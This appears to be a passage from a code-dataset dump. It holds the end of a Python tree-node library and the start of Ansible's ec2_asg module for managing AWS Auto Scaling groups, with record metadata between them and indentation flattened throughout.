@abc.abstractmethod
def foreach(self, f: Callable[['Node'], None]) -> None:
...
@abc.abstractmethod
def filter(self, pred: Callable[['Node'], bool]) -> 'Node':
...
def filter_not(self, pred: Callable[['Node'], bool]) -> 'Node':
return self.filter(lambda a: not pred(a))
@abc.abstractproperty
def flatten(self) -> 'LazyList[Any]':
...
@abc.abstractmethod
def contains(self, target: 'Node') -> Boolean:
...
@abc.abstractmethod
def lift(self, key: Key) -> 'SubTree':
...
def __getitem__(self, key: Key) -> 'SubTree':
return self.lift(key)
@abc.abstractproperty
def s(self) -> 'SubTree':
...
@abc.abstractproperty
def empty(self) -> Boolean:
...
@curried
def fold_left(self, z: Z, f: Callable[[Z, 'Node'], Z]) -> Z:
z1 = f(z, self)
return self.sub_l.fold_left(z1)(lambda z2, a: a.fold_left(z2)(f))
@abc.abstractmethod
def replace(self, data: LazyList['Node[Data1, Sub1]']) -> 'Node[Data1, Sub1]':
...
@abc.abstractmethod
def map_nodes(self, f: Callable[['Node[Data, Sub]'], 'Node[Data, Sub]']) -> 'Node[Data, Sub]':
...
class Inode(Generic[Data, Sub], Node[Data, Sub]):
@abc.abstractproperty
def sub(self) -> LazyList[Any]:
...
def foreach(self, f: Callable[[Node], None]) -> None:
f(self)
self.sub_l.foreach(__.foreach(f))
@property
def flatten(self) -> LazyList[Any]:
return self.sub_l.flat_map(_.flatten).cons(self)
def contains(self, target: Node) -> Boolean:
return self.sub_l.contains(target)
@property
def empty(self) -> Boolean:
return self.data.empty
class ListNode(Generic[Data], Inode[Data, LazyList[Node[Data, Any]]]):
def __init__(self, sub: LazyList[Node[Data, Any]]) -> None:
self.data = sub
@property
def sub(self) -> LazyList[Node[Data, Any]]:
return self.data
@property
def sub_l(self) -> LazyList[Node[Data, Any]]:
return self.sub
@property
def _desc(self) -> str:
return '[]'
def _strings(self) -> LazyList[str]:
return indent(self.sub // (lambda a: a._strings())).cons(self._desc)
@property
def head(self) -> 'SubTree':
return self.lift(0)
@property
def last(self) -> 'SubTree':
return self.lift(-1)
def __str__(self) -> str:
return '{}({})'.format(self.__class__.__name__, self.sub.map(str).mk_string(','))
def __repr__(self) -> str:
return str(self)
def lift(self, key: Key) -> 'SubTree':
return (
SubTreeInvalid(key, 'ListNode index must be int')
if isinstance(key, str) else
self.sub.lift(key) / L(SubTree.cons)(_, key) | (lambda: SubTreeInvalid(key, 'ListNode index oob'))
)
def replace(self, sub: LazyList[Any]) -> Node:
return ListNode(sub)
def filter(self, pred: Callable[[Node], bool]) -> Node:
def filt(n: Node) -> bool:
return (
pred(n)
if isinstance(n, LeafNode) else
not n.empty
)
return self.replace(self.sub.map(__.filter(pred)).filter(filt))
@property
def s(self) -> 'SubTree':
return SubTreeList(self, 'root')
def map_nodes(self, f: Callable[['Node[Data, Sub]'], 'Node[Data, Sub]']) -> 'Node[Data, Sub]':
return f(ListNode(self.sub.map(lambda a: a.map_nodes(f))))
class MapNode(Generic[Data], Inode[Data, Map[str, Node[Data, Any]]]):
def __init__(self, data: Map[str, Node[Data, Any]]) -> None:
self.data = data
@property
def sub(self) -> Map[str, Node[Data, Any]]:
return self.data
@property
def sub_l(self) -> LazyList[Node[Data, Any]]:
return LazyList(self.data.v)
@property
def _desc(self) -> str:
return '{}'
def _strings(self) -> LazyList[str]:
return indent(self.sub_l // (lambda a: a._strings())).cons(self._desc)
def __str__(self) -> str:
return '{}({})'.format(self.__class__.__name__, self.sub_l)
def __repr__(self) -> str:
return str(self)
# TODO allow int indexes into sub_l
def lift(self, key: Key) -> 'SubTree':
def err() -> 'SubTree':
keys = ', '.join(self.data.keys())
return SubTreeInvalid(key, f'MapNode({self.rule}) invalid key ({keys})')
return (
self.data.lift(key) /
L(SubTree.cons)(_, key) |
err
)
def replace(self, sub: Map[str, Node]) -> Node:
return MapNode(sub)
def filter(self, pred: Callable[[Node], bool]) -> Node:
def filt(n: Node) -> bool:
return (
pred(n)
if isinstance(n, LeafNode) else
not n.empty
)
return self.replace(self.data.valmap(__.filter(pred)).valfilter(filt))
@property
def s(self) -> 'SubTree':
return SubTreeMap(self, 'root')
def map_nodes(self, f: Callable[['Node[Data, Sub]'], 'Node[Data, Sub]']) -> 'Node[Data, Sub]':
return f(MapNode(self.sub.valmap(lambda a: a.map_nodes(f))))
class LeafNode(Generic[Data], Node[Data, None]):
def __init__(self, data: Data) -> None:
self.data = data
def _strings(self) -> LazyList[Data]:
return LazyLists.cons(self.data)
@property
def sub(self) -> None:
pass
@property
def sub_l(self) -> LazyList[Node[Data, Any]]:
return LazyList([])
def foreach(self, f: Callable[[Node], None]) -> None:
f(self)
def filter(self, pred: Callable[[Node], bool]) -> Node:
return self
@property
def flatten(self) -> LazyList[Any]:
return LazyLists.cons(self)
def contains(self, target: Node) -> Boolean:
return false
def lift(self, key: Key) -> 'SubTree':
return SubTreeInvalid(key, 'LeafNode cannot be indexed')
def __str__(self) -> str:
return '{}({})'.format(self.__class__.__name__, self.data)
def __repr__(self) -> str:
return str(self)
@property
def empty(self) -> Boolean:
return false
@property
def s(self) -> 'SubTree':
return SubTreeLeaf(self, 'root')
def replace(self, sub: Data) -> Node:
return LeafNode(sub)
def map_nodes(self, f: Callable[['Node[Data, Sub]'], 'Node[Data, Sub]']) -> 'Node[Data, Sub]':
return f(self)
class TreeFlatMap(FlatMap, tpe=Node):
def flat_map(self, fa: Node[A, Any], f: Callable[[A], Node[B, Any]]) -> Node[B, Any]:
return (
self.flat_map_inode(fa, f)
if isinstance(fa, Inode) else
self.flat_map_leaf(fa, f)
)
def flat_map_inode(self, fa: Inode[A, Any], f: Callable[[A], Node[B, Any]]) -> Node[B, Any]:
def err() -> Inode[A, Any]:
raise Exception(f'invalid sub for `TreeFlatMap.flat_map_inode`: {fa}')
return (
self.flat_map_map(fa, f)
if isinstance(fa, MapNode) else
self.flat_map_list(fa, f)
if isinstance(fa, ListNode) else
err()
)
def flat_map_map(self, fa: MapNode[A], f: Callable[[A], Node[B, Any]]) -> Node[B, Any]:
return MapNode(fa.sub.valmap(lambda a: self.flat_map(a, f)))
def flat_map_list(self, fa: ListNode[A], f: Callable[[A], Node[B, Any]]) -> Node[B, Any]:
return ListNode(fa.sub.map(lambda a: self.flat_map(a, f)))
def flat_map_leaf(self, fa: LeafNode[A], f: Callable[[A], Node[B, Any]]) -> Node[B, Any]:
return f(fa.data)
def map(self, fa: Node[A, Any], f: Callable[[A], B]) -> Node[B, Any]:
return (
self.map_inode(fa, f)
if isinstance(fa, Inode) else
self.map_leaf(fa, f)
)
def map_inode(self, fa: Inode[A, Any], f: Callable[[A], B]) -> Node[B, Any]:
def err() -> Inode[A, Any]:
raise Exception(f'invalid sub for `TreeFlatMap.map_inode`: {fa}')
return (
self.map_map(fa, f)
if isinstance(fa, MapNode) else
self.map_list(fa, f)
if isinstance(fa, ListNode) else
err()
)
def map_map(self, fa: MapNode[A], f: Callable[[A], B]) -> Node[B, Any]:
return MapNode(fa.data.valmap(lambda a: self.map(a, f)))
def map_list(self, fa: ListNode[A], f: Callable[[A], B]) -> Node[B, Any]:
return ListNode(fa.sub.map(lambda a: self.map(a, f)))
def map_leaf(self, fa: LeafNode[A], f: Callable[[A], B]) -> Node[B, Any]:
return LeafNode(f(fa.data))
class SubTree(Implicits, implicits=True, auto=True):
@staticmethod
def cons(fa: Node, key: Key) -> 'SubTree':
return ( # type: ignore
cast(SubTree, SubTreeList(fa, key))
if isinstance(fa, ListNode) else
SubTreeLeaf(fa, key)
if isinstance(fa, LeafNode) else
SubTreeMap(fa, key)
)
@staticmethod
def from_maybe(data: Maybe[Node], key: Key, err: str) -> 'SubTree':
return data.cata(SubTree.cons, SubTreeInvalid(key, err))
def __getattr__(self, key: Key) -> 'SubTree':
try:
return super().__getattr__(key)
except AttributeError:
return self._getattr(key)
@abc.abstractmethod
def _getattr(self, key: Key) -> 'SubTree':
...
def __getitem__(self, key: Key) -> 'SubTree':
return self._getitem(key)
@abc.abstractmethod
def _getitem(self, key: Key) -> 'SubTree':
...
def cata(self, f: Callable[[Node], A], b: Union[A, Callable[[], A]]) -> A:
return (
f(self.data)
if isinstance(self, SubTreeValid)
else call_by_name(b)
)
@abc.abstractproperty
def e(self) -> Either[str, Node]:
...
@abc.abstractproperty
def valid(self) -> Boolean:
...
@abc.abstractproperty
def strings(self) -> LazyList[str]:
...
@abc.abstractproperty
def show(self) -> LazyList[str]:
...
@property
def rule(self) -> Either[str, str]:
return self.e.map(_.rule)
class SubTreeValid(SubTree):
def __init__(self, data: Node, key: Key) -> None:
self.data = data
self._key = key
def __str__(self) -> str:
return '{}({})'.format(self.__class__.__name__, self.data)
@property
def e(self) -> Either[str, Node]:
return Right(self.data)
@property
def valid(self) -> Boolean:
return true
@property
def strings(self) -> LazyList[str]:
return self.data.strings
@property
def show(self) -> str:
return self.data.show
class SubTreeList(SubTreeValid):
@property
def head(self) -> SubTree:
return self[0]
@property
def last(self) -> SubTree:
return self[-1]
def _getattr(self, key: Key) -> SubTree:
return SubTreeInvalid(key, 'cannot access attrs in SubTreeList')
def _getitem(self, key: Key) -> SubTree:
return self.data.lift(key)
def __str__(self) -> str:
return '{}({})'.format(self.__class__.__name__, self.data.sub_l.drain.join_comma)
@property
def _keys(self) -> LazyList[str]:
return self.data.k
class SubTreeLeaf(SubTreeValid):
def err(self, key: Key) -> SubTree:
return SubTreeInvalid(key, 'cannot access attrs in SubTreeLeaf')
def _getattr(self, key: Key) -> SubTree:
return self.err(key)
def _getitem(self, key: Key) -> SubTree:
return self.err(key)
class SubTreeMap(SubTreeValid):
def _getattr(self, key: Key) -> SubTree:
return self.data.lift(key)
def _getitem(self, key: Key) -> SubTree:
return self.data.lift(key)
@property
def _keys(self) -> LazyList[str]:
return self.data.k
class SubTreeInvalid(SubTree):
def __init__(self, key: Key, reason: str) -> None:
self.key = key
self.reason = reason
def __str__(self) -> str:
s = 'SubTreeInvalid({}, {})'
return s.format(self.key, self.reason)
def __repr__(self) -> str:
return str(self)
@property
def valid(self) -> Boolean:
return false
@property
def _error(self) -> str:
return 'no subtree `{}`: {}'.format(self.key, self.reason)
def _getattr(self, key: Key) -> SubTree:
return self
def _getitem(self, key: Key) -> SubTree:
return self
@property
def e(self) -> Either[str, Node]:
return Left(self._error)
@property
def strings(self) -> LazyList[str]:
return LazyList([])
@property
def show(self) -> LazyList[str]:
return str(self)
__all__ = ('Node', 'Inode', 'LeafNode', 'MapNode', 'LeafNode', 'ListNode')
|
mit
| -5,395,947,376,289,710,000
| 25.76
| 110
| 0.55947
| false
| 3.380414
| false
| false
| false
|
KyleJamesWalker/ansible-modules-core
|
cloud/amazon/ec2_asg.py
|
1
|
34388
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = """
---
module: ec2_asg
short_description: Create or delete AWS Autoscaling Groups
description:
- Can create or delete AWS Autoscaling Groups
- Works with the ec2_lc module to manage Launch Configurations
version_added: "1.6"
author: "Gareth Rushgrove (@garethr)"
options:
state:
description:
- register or deregister the instance
required: true
choices: ['present', 'absent']
name:
description:
- Unique name for group to be created or deleted
required: true
load_balancers:
description:
- List of ELB names to use for the group
required: false
availability_zones:
description:
- List of availability zone names in which to create the group. Defaults to all the availability zones in the region if vpc_zone_identifier is not set.
required: false
launch_config_name:
description:
- Name of the Launch configuration to use for the group. See the ec2_lc module for managing these.
required: true
min_size:
description:
- Minimum number of instances in group, if unspecified then the current group value will be used.
required: false
max_size:
description:
- Maximum number of instances in group, if unspecified then the current group value will be used.
required: false
desired_capacity:
description:
- Desired number of instances in group, if unspecified then the current group value will be used.
required: false
replace_all_instances:
description:
- In a rolling fashion, replace all instances with an old launch configuration with one from the current launch configuration.
required: false
version_added: "1.8"
default: False
replace_batch_size:
description:
- Number of instances you'd like to replace at a time. Used with replace_all_instances.
required: false
version_added: "1.8"
default: 1
replace_instances:
description:
- List of instance_ids belonging to the named ASG that you would like to terminate and be replaced with instances matching the current launch configuration.
required: false
version_added: "1.8"
default: None
lc_check:
description:
- Check to make sure instances that are being replaced with replace_instances do not aready have the current launch_config.
required: false
version_added: "1.8"
default: True
vpc_zone_identifier:
description:
- List of VPC subnets to use
required: false
default: None
tags:
description:
- A list of tags to add to the Auto Scale Group. Optional key is 'propagate_at_launch', which defaults to true.
required: false
default: None
version_added: "1.7"
health_check_period:
description:
- Length of time in seconds after a new EC2 instance comes into service that Auto Scaling starts checking its health.
required: false
default: 500 seconds
version_added: "1.7"
health_check_type:
description:
- The service you want the health status from, Amazon EC2 or Elastic Load Balancer.
required: false
default: EC2
version_added: "1.7"
choices: ['EC2', 'ELB']
default_cooldown:
description:
- The number of seconds after a scaling activity completes before another can begin.
required: false
default: 300 seconds
version_added: "2.0"
wait_timeout:
description:
- how long before wait instances to become viable when replaced. Used in concjunction with instance_ids option.
default: 300
version_added: "1.8"
wait_for_instances:
description:
- Wait for the ASG instances to be in a ready state before exiting. If instances are behind an ELB, it will wait until the ELB determines all instances have a lifecycle_state of "InService" and a health_status of "Healthy".
version_added: "1.9"
default: yes
required: False
termination_policies:
description:
- An ordered list of criteria used for selecting instances to be removed from the Auto Scaling group when reducing capacity.
- For 'Default', when used to create a new autoscaling group, the "Default" value is used. When used to change an existent autoscaling group, the current termination policies are mantained
required: false
default: Default
choices: ['OldestInstance', 'NewestInstance', 'OldestLaunchConfiguration', 'ClosestToNextInstanceHour', 'Default']
version_added: "2.0"
extends_documentation_fragment:
- aws
- ec2
"""
EXAMPLES = '''
# Basic configuration
- ec2_asg:
name: special
load_balancers: [ 'lb1', 'lb2' ]
availability_zones: [ 'eu-west-1a', 'eu-west-1b' ]
launch_config_name: 'lc-1'
min_size: 1
max_size: 10
desired_capacity: 5
vpc_zone_identifier: [ 'subnet-abcd1234', 'subnet-1a2b3c4d' ]
tags:
- environment: production
propagate_at_launch: no
# Rolling ASG Updates
Below is an example of how to assign a new launch config to an ASG and terminate old instances.
All instances in "myasg" that do not have the launch configuration named "my_new_lc" will be terminated in
a rolling fashion with instances using the current launch configuration, "my_new_lc".
This could also be considered a rolling deploy of a pre-baked AMI.
If this is a newly created group, the instances will not be replaced since all instances
will have the current launch configuration.
- name: create launch config
ec2_lc:
name: my_new_lc
image_id: ami-lkajsf
key_name: mykey
region: us-east-1
security_groups: sg-23423
instance_type: m1.small
assign_public_ip: yes
- ec2_asg:
name: myasg
launch_config_name: my_new_lc
health_check_period: 60
health_check_type: ELB
replace_all_instances: yes
min_size: 5
max_size: 5
desired_capacity: 5
region: us-east-1
To only replace a couple of instances instead of all of them, supply a list
to "replace_instances":
- ec2_asg:
name: myasg
launch_config_name: my_new_lc
health_check_period: 60
health_check_type: ELB
replace_instances:
- i-b345231
- i-24c2931
min_size: 5
max_size: 5
desired_capacity: 5
region: us-east-1
'''
import time
import logging as log
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
log.getLogger('boto').setLevel(log.CRITICAL)
#log.basicConfig(filename='/tmp/ansible_ec2_asg.log',level=log.DEBUG, format='%(asctime)s: %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
try:
import boto.ec2.autoscale
from boto.ec2.autoscale import AutoScaleConnection, AutoScalingGroup, Tag
from boto.exception import BotoServerError
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
ASG_ATTRIBUTES = ('availability_zones', 'default_cooldown', 'desired_capacity',
'health_check_period', 'health_check_type', 'launch_config_name',
'load_balancers', 'max_size', 'min_size', 'name', 'placement_group',
'termination_policies', 'vpc_zone_identifier')
INSTANCE_ATTRIBUTES = ('instance_id', 'health_status', 'lifecycle_state', 'launch_config_name')
def enforce_required_arguments(module):
''' As many arguments are not required for autoscale group deletion
they cannot be mandatory arguments for the module, so we enforce
them here '''
missing_args = []
for arg in ('min_size', 'max_size', 'launch_config_name'):
if module.params[arg] is None:
missing_args.append(arg)
if missing_args:
module.fail_json(msg="Missing required arguments for autoscaling group create/update: %s" % ",".join(missing_args))
def get_properties(autoscaling_group):
properties = dict((attr, getattr(autoscaling_group, attr)) for attr in ASG_ATTRIBUTES)
# Ugly hack to make this JSON-serializable. We take a list of boto Tag
# objects and replace them with a dict-representation. Needed because the
# tags are included in ansible's return value (which is jsonified)
if 'tags' in properties and isinstance(properties['tags'], list):
serializable_tags = {}
for tag in properties['tags']:
serializable_tags[tag.key] = [tag.value, tag.propagate_at_launch]
properties['tags'] = serializable_tags
properties['healthy_instances'] = 0
properties['in_service_instances'] = 0
properties['unhealthy_instances'] = 0
properties['pending_instances'] = 0
properties['viable_instances'] = 0
properties['terminating_instances'] = 0
instance_facts = {}
if autoscaling_group.instances:
properties['instances'] = [i.instance_id for i in autoscaling_group.instances]
for i in autoscaling_group.instances:
instance_facts[i.instance_id] = {'health_status': i.health_status,
'lifecycle_state': i.lifecycle_state,
'launch_config_name': i.launch_config_name }
if i.health_status == 'Healthy' and i.lifecycle_state == 'InService':
properties['viable_instances'] += 1
if i.health_status == 'Healthy':
properties['healthy_instances'] += 1
else:
properties['unhealthy_instances'] += 1
if i.lifecycle_state == 'InService':
properties['in_service_instances'] += 1
if i.lifecycle_state == 'Terminating':
properties['terminating_instances'] += 1
if i.lifecycle_state == 'Pending':
properties['pending_instances'] += 1
properties['instance_facts'] = instance_facts
properties['load_balancers'] = autoscaling_group.load_balancers
if getattr(autoscaling_group, "tags", None):
properties['tags'] = dict((t.key, t.value) for t in autoscaling_group.tags)
return properties
def elb_dreg(asg_connection, module, group_name, instance_id):
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
as_group = asg_connection.get_all_groups(names=[group_name])[0]
wait_timeout = module.params.get('wait_timeout')
props = get_properties(as_group)
count = 1
if as_group.load_balancers and as_group.health_check_type == 'ELB':
try:
elb_connection = connect_to_aws(boto.ec2.elb, region, **aws_connect_params)
except boto.exception.NoAuthHandlerFound, e:
module.fail_json(msg=str(e))
else:
return
for lb in as_group.load_balancers:
elb_connection.deregister_instances(lb, instance_id)
log.debug("De-registering {0} from ELB {1}".format(instance_id, lb))
wait_timeout = time.time() + wait_timeout
while wait_timeout > time.time() and count > 0:
count = 0
for lb in as_group.load_balancers:
lb_instances = elb_connection.describe_instance_health(lb)
for i in lb_instances:
if i.instance_id == instance_id and i.state == "InService":
count += 1
log.debug("{0}: {1}, {2}".format(i.instance_id, i.state, i.description))
time.sleep(10)
if wait_timeout <= time.time():
# waiting took too long
module.fail_json(msg = "Waited too long for instance to deregister. {0}".format(time.asctime()))
def elb_healthy(asg_connection, elb_connection, module, group_name):
healthy_instances = []
as_group = asg_connection.get_all_groups(names=[group_name])[0]
props = get_properties(as_group)
# get healthy, inservice instances from ASG
instances = []
for instance, settings in props['instance_facts'].items():
if settings['lifecycle_state'] == 'InService' and settings['health_status'] == 'Healthy':
instances.append(instance)
log.debug("ASG considers the following instances InService and Healthy: {0}".format(instances))
log.debug("ELB instance status:")
for lb in as_group.load_balancers:
# we catch a race condition that sometimes happens if the instance exists in the ASG
# but has not yet show up in the ELB
try:
lb_instances = elb_connection.describe_instance_health(lb, instances=instances)
except boto.exception.InvalidInstance:
pass
for i in lb_instances:
if i.state == "InService":
healthy_instances.append(i.instance_id)
log.debug("{0}: {1}".format(i.instance_id, i.state))
return len(healthy_instances)
def wait_for_elb(asg_connection, module, group_name):
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
wait_timeout = module.params.get('wait_timeout')
# if the health_check_type is ELB, we want to query the ELBs directly for instance
# status as to avoid health_check_grace period that is awarded to ASG instances
as_group = asg_connection.get_all_groups(names=[group_name])[0]
if as_group.load_balancers and as_group.health_check_type == 'ELB':
log.debug("Waiting for ELB to consider intances healthy.")
try:
elb_connection = connect_to_aws(boto.ec2.elb, region, **aws_connect_params)
except boto.exception.NoAuthHandlerFound, e:
module.fail_json(msg=str(e))
wait_timeout = time.time() + wait_timeout
healthy_instances = elb_healthy(asg_connection, elb_connection, module, group_name)
while healthy_instances < as_group.min_size and wait_timeout > time.time():
healthy_instances = elb_healthy(asg_connection, elb_connection, module, group_name)
log.debug("ELB thinks {0} instances are healthy.".format(healthy_instances))
time.sleep(10)
if wait_timeout <= time.time():
# waiting took too long
module.fail_json(msg = "Waited too long for ELB instances to be healthy. %s" % time.asctime())
log.debug("Waiting complete. ELB thinks {0} instances are healthy.".format(healthy_instances))
def create_autoscaling_group(connection, module):
group_name = module.params.get('name')
load_balancers = module.params['load_balancers']
availability_zones = module.params['availability_zones']
launch_config_name = module.params.get('launch_config_name')
min_size = module.params['min_size']
max_size = module.params['max_size']
desired_capacity = module.params.get('desired_capacity')
vpc_zone_identifier = module.params.get('vpc_zone_identifier')
set_tags = module.params.get('tags')
health_check_period = module.params.get('health_check_period')
health_check_type = module.params.get('health_check_type')
default_cooldown = module.params.get('default_cooldown')
wait_for_instances = module.params.get('wait_for_instances')
as_groups = connection.get_all_groups(names=[group_name])
wait_timeout = module.params.get('wait_timeout')
termination_policies = module.params.get('termination_policies')
if not vpc_zone_identifier and not availability_zones:
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
try:
ec2_connection = connect_to_aws(boto.ec2, region, **aws_connect_params)
except (boto.exception.NoAuthHandlerFound, AnsibleAWSError), e:
module.fail_json(msg=str(e))
elif vpc_zone_identifier:
vpc_zone_identifier = ','.join(vpc_zone_identifier)
asg_tags = []
for tag in set_tags:
for k,v in tag.iteritems():
if k !='propagate_at_launch':
asg_tags.append(Tag(key=k,
value=v,
propagate_at_launch=bool(tag.get('propagate_at_launch', True)),
resource_id=group_name))
if not as_groups:
if not vpc_zone_identifier and not availability_zones:
availability_zones = module.params['availability_zones'] = [zone.name for zone in ec2_connection.get_all_zones()]
enforce_required_arguments(module)
launch_configs = connection.get_all_launch_configurations(names=[launch_config_name])
ag = AutoScalingGroup(
group_name=group_name,
load_balancers=load_balancers,
availability_zones=availability_zones,
launch_config=launch_configs[0],
min_size=min_size,
max_size=max_size,
desired_capacity=desired_capacity,
vpc_zone_identifier=vpc_zone_identifier,
connection=connection,
tags=asg_tags,
health_check_period=health_check_period,
health_check_type=health_check_type,
default_cooldown=default_cooldown,
termination_policies=termination_policies)
try:
connection.create_auto_scaling_group(ag)
if wait_for_instances:
wait_for_new_inst(module, connection, group_name, wait_timeout, desired_capacity, 'viable_instances')
wait_for_elb(connection, module, group_name)
as_group = connection.get_all_groups(names=[group_name])[0]
asg_properties = get_properties(as_group)
changed = True
return(changed, asg_properties)
except BotoServerError, e:
module.fail_json(msg=str(e))
else:
as_group = as_groups[0]
changed = False
for attr in ASG_ATTRIBUTES:
if module.params.get(attr, None) is not None:
module_attr = module.params.get(attr)
if attr == 'vpc_zone_identifier':
module_attr = ','.join(module_attr)
group_attr = getattr(as_group, attr)
# we do this because AWS and the module may return the same list
# sorted differently
try:
module_attr.sort()
except:
pass
try:
group_attr.sort()
except:
pass
if group_attr != module_attr:
changed = True
setattr(as_group, attr, module_attr)
if len(set_tags) > 0:
have_tags = {}
want_tags = {}
for tag in asg_tags:
want_tags[tag.key] = [tag.value, tag.propagate_at_launch]
dead_tags = []
for tag in as_group.tags:
have_tags[tag.key] = [tag.value, tag.propagate_at_launch]
if tag.key not in want_tags:
changed = True
dead_tags.append(tag)
if dead_tags != []:
connection.delete_tags(dead_tags)
if have_tags != want_tags:
changed = True
connection.create_or_update_tags(asg_tags)
# handle loadbalancers separately because None != []
load_balancers = module.params.get('load_balancers') or []
if load_balancers and as_group.load_balancers != load_balancers:
changed = True
as_group.load_balancers = module.params.get('load_balancers')
if changed:
try:
as_group.update()
except BotoServerError, e:
module.fail_json(msg=str(e))
if wait_for_instances:
wait_for_new_inst(module, connection, group_name, wait_timeout, desired_capacity, 'viable_instances')
wait_for_elb(connection, module, group_name)
try:
as_group = connection.get_all_groups(names=[group_name])[0]
asg_properties = get_properties(as_group)
except BotoServerError, e:
module.fail_json(msg=str(e))
return(changed, asg_properties)
def delete_autoscaling_group(connection, module):
group_name = module.params.get('name')
groups = connection.get_all_groups(names=[group_name])
if groups:
group = groups[0]
group.max_size = 0
group.min_size = 0
group.desired_capacity = 0
group.update()
instances = True
while instances:
tmp_groups = connection.get_all_groups(names=[group_name])
if tmp_groups:
tmp_group = tmp_groups[0]
if not tmp_group.instances:
instances = False
time.sleep(10)
group.delete()
while len(connection.get_all_groups(names=[group_name])):
time.sleep(5)
changed=True
return changed
else:
changed=False
return changed
def get_chunks(l, n):
for i in xrange(0, len(l), n):
yield l[i:i+n]
def update_size(group, max_size, min_size, dc):
log.debug("setting ASG sizes")
log.debug("minimum size: {0}, desired_capacity: {1}, max size: {2}".format(min_size, dc, max_size ))
group.max_size = max_size
group.min_size = min_size
group.desired_capacity = dc
group.update()
def replace(connection, module):
batch_size = module.params.get('replace_batch_size')
wait_timeout = module.params.get('wait_timeout')
group_name = module.params.get('name')
max_size = module.params.get('max_size')
min_size = module.params.get('min_size')
desired_capacity = module.params.get('desired_capacity')
lc_check = module.params.get('lc_check')
replace_instances = module.params.get('replace_instances')
as_group = connection.get_all_groups(names=[group_name])[0]
wait_for_new_inst(module, connection, group_name, wait_timeout, as_group.min_size, 'viable_instances')
props = get_properties(as_group)
instances = props.get('instances', [])
if replace_instances:
instances = replace_instances
# check to see if instances are replaceable if checking launch configs
new_instances, old_instances = get_instances_by_lc(props, lc_check, instances)
num_new_inst_needed = desired_capacity - len(new_instances)
if lc_check:
if num_new_inst_needed == 0 and old_instances:
log.debug("No new instances needed, but old instances are present. Removing old instances")
terminate_batch(connection, module, old_instances, instances, True)
as_group = connection.get_all_groups(names=[group_name])[0]
props = get_properties(as_group)
changed = True
return(changed, props)
# we don't want to spin up extra instances if not necessary
if num_new_inst_needed < batch_size:
log.debug("Overriding batch size to {0}".format(num_new_inst_needed))
batch_size = num_new_inst_needed
if not old_instances:
changed = False
return(changed, props)
#check if min_size/max_size/desired capacity have been specified and if not use ASG values
if min_size is None:
min_size = as_group.min_size
if max_size is None:
max_size = as_group.max_size
if desired_capacity is None:
desired_capacity = as_group.desired_capacity
# set temporary settings and wait for them to be reached
# This should get overriden if the number of instances left is less than the batch size.
as_group = connection.get_all_groups(names=[group_name])[0]
update_size(as_group, max_size + batch_size, min_size + batch_size, desired_capacity + batch_size)
wait_for_new_inst(module, connection, group_name, wait_timeout, as_group.min_size, 'viable_instances')
wait_for_elb(connection, module, group_name)
as_group = connection.get_all_groups(names=[group_name])[0]
props = get_properties(as_group)
instances = props.get('instances', [])
if replace_instances:
instances = replace_instances
log.debug("beginning main loop")
for i in get_chunks(instances, batch_size):
# break out of this loop if we have enough new instances
break_early, desired_size, term_instances = terminate_batch(connection, module, i, instances, False)
wait_for_term_inst(connection, module, term_instances)
wait_for_new_inst(module, connection, group_name, wait_timeout, desired_size, 'viable_instances')
wait_for_elb(connection, module, group_name)
as_group = connection.get_all_groups(names=[group_name])[0]
if break_early:
log.debug("breaking loop")
break
update_size(as_group, max_size, min_size, desired_capacity)
as_group = connection.get_all_groups(names=[group_name])[0]
asg_properties = get_properties(as_group)
log.debug("Rolling update complete.")
changed=True
return(changed, asg_properties)
def get_instances_by_lc(props, lc_check, initial_instances):
new_instances = []
old_instances = []
# old instances are those that have the old launch config
if lc_check:
for i in props.get('instances', []):
if props['instance_facts'][i]['launch_config_name'] == props['launch_config_name']:
new_instances.append(i)
else:
old_instances.append(i)
else:
log.debug("Comparing initial instances with current: {0}".format(initial_instances))
for i in props.get('instances', []):
if i not in initial_instances:
new_instances.append(i)
else:
old_instances.append(i)
log.debug("New instances: {0}, {1}".format(len(new_instances), new_instances))
log.debug("Old instances: {0}, {1}".format(len(old_instances), old_instances))
return new_instances, old_instances
def list_purgeable_instances(props, lc_check, replace_instances, initial_instances):
instances_to_terminate = []
instances = ( inst_id for inst_id in replace_instances if inst_id in props.get('instances', []))
# check to make sure instances given are actually in the given ASG
# and they have a non-current launch config
if lc_check:
for i in instances:
if props['instance_facts'][i]['launch_config_name'] != props['launch_config_name']:
instances_to_terminate.append(i)
else:
for i in instances:
if i in initial_instances:
instances_to_terminate.append(i)
return instances_to_terminate
def terminate_batch(connection, module, replace_instances, initial_instances, leftovers=False):
batch_size = module.params.get('replace_batch_size')
min_size = module.params.get('min_size')
desired_capacity = module.params.get('desired_capacity')
group_name = module.params.get('name')
wait_timeout = int(module.params.get('wait_timeout'))
lc_check = module.params.get('lc_check')
decrement_capacity = False
break_loop = False
as_group = connection.get_all_groups(names=[group_name])[0]
props = get_properties(as_group)
desired_size = as_group.min_size
new_instances, old_instances = get_instances_by_lc(props, lc_check, initial_instances)
num_new_inst_needed = desired_capacity - len(new_instances)
# check to make sure instances given are actually in the given ASG
# and they have a non-current launch config
instances_to_terminate = list_purgeable_instances(props, lc_check, replace_instances, initial_instances)
log.debug("new instances needed: {0}".format(num_new_inst_needed))
log.debug("new instances: {0}".format(new_instances))
log.debug("old instances: {0}".format(old_instances))
log.debug("batch instances: {0}".format(",".join(instances_to_terminate)))
if num_new_inst_needed == 0:
decrement_capacity = True
if as_group.min_size != min_size:
as_group.min_size = min_size
as_group.update()
log.debug("Updating minimum size back to original of {0}".format(min_size))
#if are some leftover old instances, but we are already at capacity with new ones
# we don't want to decrement capacity
if leftovers:
decrement_capacity = False
break_loop = True
instances_to_terminate = old_instances
desired_size = min_size
log.debug("No new instances needed")
if num_new_inst_needed < batch_size and num_new_inst_needed !=0 :
